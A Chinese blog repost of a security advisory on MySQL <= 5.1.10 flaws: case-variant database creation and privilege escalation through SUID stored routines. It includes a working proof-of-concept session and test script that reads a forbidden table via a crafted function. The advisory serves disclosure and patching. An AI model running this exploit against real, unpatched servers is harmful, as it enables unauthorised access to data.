MySQL权限提升及安全限制绕过漏洞

最新推荐文章于 2023-03-31 18:09:50 发布
最新推荐文章于 2023-03-31 18:09:50 发布
阅读量552 收藏
点赞数
文章标签: mysql database function 数据库 security user
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bbok11/article/details/4385429
版权

受影响系统:

MySQL AB MySQL <= 5.1.10

描述:

BUGTRAQ ID: 19559

MySQL是一款使用非常广泛的开放源代码关系数据库系统,拥有各种平台的运行版本。

在MySQL上,拥有访问权限但无创建权限的用户可以创建与所访问数据库仅有名称字母大小写区别的新数据库。成功利用这个漏洞要求运行MySQL的文件系统支持区分大小写的文件名。

此外,由于在错误的安全环境中计算了suid例程的参数,攻击者可以通过存储的例程以例程定义者的权限执行任意DML语句。成功攻击要求用户对所存储例程拥有EXECUTE权限。

测试方法:

【警 告:以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!】

1、创建数据库


$ mysql -h my.mysql.server -u sample -p -A sample
Enter password:
Welcome to the MySQL monitor. Commands end with ; or /g.
Your MySQL connection id is 263935 to server version: 4.1.16-standard

mysql> create database another;
ERROR 1044: Access denied for user 'sample'@'%' to database 'another'

mysql> create database sAmple;
Query OK, 1 row affected (0.00 sec)

2、权限提升


--disable_warnings
drop database if exists mysqltest1;
drop database if exists mysqltest2;
drop function if exists f_suid;
--enable_warnings

# Prepare playground
create database mysqltest1;
create database mysqltest2;
create user malory@localhost;
grant all privileges on mysqltest1.* to malory@localhost;

# Create harmless (but SUID!) function
create function f_suid(i int) returns int return 0;
grant execute on function test.f_suid to malory@localhost;

use mysqltest2;
# Create table in which malory@localhost will be interested but to which
# he won't have any access
create table t1 (i int);

connect (malcon, localhost, malory,,mysqltest1);

# Correct malory@localhost don't have access to mysqltest2.t1
--error ER_TABLEACCESS_DENIED_ERROR
select * from mysqltest2.t1;

# Create function which will allow to exploit security hole
delimiter |;
create function f_evil ()
returns int
sql security invoker
begin
set @a:= current_user();
set @b:= (select count(*) from mysqltest2.t1);
return 0;
end|
delimiter ;|

# Again correct
--error ER_TABLEACCESS_DENIED_ERROR
select f_evil();
select @a, @b;

# Oops!!! it seems that f_evil() is executed in the context of
# f_suid() definer, so malory@locahost gets all info that he wants
select test.f_suid(f_evil());
select @a, @b;

connection default;
drop user malory@localhost;
drop database mysqltest1;
drop database mysqltest2;

建议:

厂商补丁:MySQL AB

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载。

程序员特区

http://coderarea.net/html/Linuxbiancheng/Linuxshujuku/MYSQL/2009/0306/49969.html

bbok11
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
禅道项目管理系统身份认证绕过漏洞复现(QVD-2024-15263)
0xSec
04-28 1751
2024年4月,互联网披露禅道系统存在身份认证绕过漏洞情报。经分析,确认该漏洞利用简单,并可能在绕过权限后利用后台其他漏洞实现远程代码执行,建议受影响的客户尽快修复漏洞
Bifrost 中间件 X-Requested-With 系统身份认证绕过漏洞复现
最新发布
0xSec
12-16 979
Bifrost 中间件 X-Requested-With 存在身份认证绕过漏洞,未经身份认证的攻击者可未授权创建管理员权限账号,可通过删除请求头实现身份认证绕过,获取环境内配置各种数据库账户密码。
mysql5 注入漏洞
10-30
mysql5注入漏洞代码
mysql 权限提升漏洞_MySQL权限提升安全限制绕过漏洞
weixin_42116734的博客
01-19 154
以下为引用的内容:--disable_warningsdrop database if exists mysqltest1;drop database if exists mysqltest2;drop function if exists f_suid;--enable_warnings# Prepare playgroundcreate database mysqltest1;create d...
mysql create table调用绕过访问限制漏洞_MySQL权限提升安全限制绕过漏洞
weixin_35067976的博客
01-31 115
受影响系统:MySQL AB MySQL <= 5.1.10描述:BUGTRAQ ID: 19559MySQL是一款使用非常广泛的开放源代码关系数据库系统,拥有各种平台的运行版本。在MySQL上,拥有访问权限但无创建权限的用户可以创建与所访问数据库仅有名称字母大小写区别的新数据库。成功利用这个漏洞要求运行MySQL的文件系统支持区分大小写的文件名。此外,由于在错误的环境中计算了suid例程的...
mysql特权_MySQL特权提升安全绕过漏洞
weixin_39591916的博客
02-02 148
MySQL是一款开放源代码的数据库程序。MySQL存在特权提升安全绕过问题,远程攻击者可以利用漏洞以高特权执行任意命令并绕过限制建立新的数据库。验证用户可以通过如下方法建立新的数据:$ mysql -u root -p -S /path/to/socketEnter password:mysql> create database 'sample';mysql> grant all o...
【小迪安全day13】WEB漏洞——SQL注入之MYSQL注入
RichUee的博客
12-05 1347
MYSQL注入中首先要明确当前注入点权限,高权限注入时有更多的攻击手法,有的能直接进行getshell。其中也会遇到很多阻碍,相关防御方案也要明确,所谓知己知彼,百战不殆。不论作为攻击还是防御都需要了解其中的手法和原理,这样才是一个合格的安全工作者。
Nacos 身份认证绕过漏洞(QVD-2023-6271)
feelxing的专栏
03-31 5598
Nacos 身份认证绕过漏洞(QVD-2023-6271),nacos版本从1.4.1升级到2.2.1最新版本
php绕过管理员登录,EspCMS后台登录绕过漏洞再利用
weixin_34570241的博客
03-17 771
之前4月13日在360的漏洞平台提交过一次,当时给出了能计算出db_pscode的利用工具。db_pscode是安装的时候随机生成的一个字符串常量,保存在配置文件里。4月22日,官方发布了新版本,改进了程序安装时候生成db_pscode的方法,"修复了"该漏洞。其实官方只是防住了当时的那个exp,并没有从根本上防住漏洞。22日之前是32位的md5hash字符串,这次长度变的不固定可以是1-39位的...
mysql提权漏洞
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-17 207
linux+mysql怎么提权 据我所知mysql没有管理账号这样的概念,只有不同的用户权限。默认root用户就具有所有的权限,你可以新建一个用户,使它拥有所有的权限,还可以指定从什么地方登陆。权限划分可以很细的,可以精确到table,像select这种简单的查看功能命令都可以限定。具体命令像create,grant等等...
权限提升 T1548.002 绕过UAC
qq_28205153的博客
02-17 2114
​1. 什么是 UAC 用户帐户控制 (UAC) 是 Windows Vista 和 Windows Server 2008 开始引入的一种访问控制功能。借助 UAC,应用和任务将始终在非管理员帐户的安全上下文中运行,除非管理员专门授予管理员级别的访问系统权限。 UAC 可阻止自动安装未经授权的应用并防止意外更改系统设置。 我们在运行非微软官方的软件时,即使我们的账号是属于本地管理员组的,也会以普通用户的权限来运行软件。当软件需要更改系统配置或者修改系统关键位置时,往往需要提升自己的权限来执行这些操作,此时
如何绕过防火墙提升权限
箫箫博客
10-06 2790
首先确定一下目标:http://www.sun***.com ,常见的虚拟主机。利用Upfile的漏洞相信大家获得webshell不难。我们这次获得这个webshell,不是DVBBS,而是自由动力3.6的软件上传过滤不严。网站http://www.sun***.com/lemon/Index.asp是自由动力3.6文章系统。Xr运用WinHex.exe和WSockExpert.exe上传一个网页
MySQL 远程权限
Wethoneyo的博客
12-14 202
mysql -uroot -p GRANT ALL PRIVILEGES ON *.* TO root@'%' IDENTIFIED BY 'password' WITH GRANT OPTION; GRANT ALL PRIVILEGES ON *.* TO root@'localhost' IDENTIFIED BY 'password' WITH GRANT OPTION; flush
mysql5.1.73bug_mysql5.1 系列 关于用户授权的一个bug
weixin_39883705的博客
02-11 311
不知道我这文章名字这样写是否精确,但是我在5.1.37 和 5.1.60 两个版本上碰到了这样的问题。以前网站链接数据库的用户权限是 grant all on *.* to user identified by 'password'后来感觉这样的权限太大,想修改为只能从特定主机访问特定库,于是执行revoke all on *.* from user;然后重新赋权限:revoke all on l...
利用数据库漏洞扫描评估数据库安全性 5 非授权扫描
weixin_33912638的博客
03-19 113
在前面的文章中,游侠安全网已经给大家介绍了“数据库漏洞扫描系统”的“授权扫描”和“弱口令扫描”,今天我们来下针对MySQL和MS SQL Server的“非授权扫描”。 新建一个数据库漏洞扫描任务,这里为MySQL,输入地址、端口、实例名、数据库版本。 选择相应的数据库漏洞扫描策略 发起扫描……速度很快,大约不到1分钟即可扫描完毕。在写本文之前,为了测试效果,我...
渗透mysql 5.1.73_【技巧总结】Penetration Test Engineer[5]-Operating System Security(SQL Server、MySQL提权)...
weixin_39624980的博客
02-07 845
4、数据库安全基础4.1、MSSQL数据库角色权限sysadmin:执行SQL Server中的任何动作db_owner:可以执行数据库中技术所有动作的用户public:数据库的每个合法用户都属于该角色。它为数据库中的用户提供了所有默认权限数据库身份验证SQL Server中的验证方式Windows身份验证模式SQL Server和Windows身份验证模式(混合模式)常用命令xp_cmdshe...
MySQL 5.1.73升级为MySQL 5.5.35详解
benben0503的专栏
03-10 2803
一、前言 二、概述 三、安装MySQL 5.1.73 四、升级为MySQL 5.5.35 五、总结 注,测试环境 CentOS 6.4 x86_64,MySQL 版本(5.1.73、5.5.35)目前最新版。下载地址:http://dev.mysql.com/downloads/mysql/5.1.html#downloads。 一、前言
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值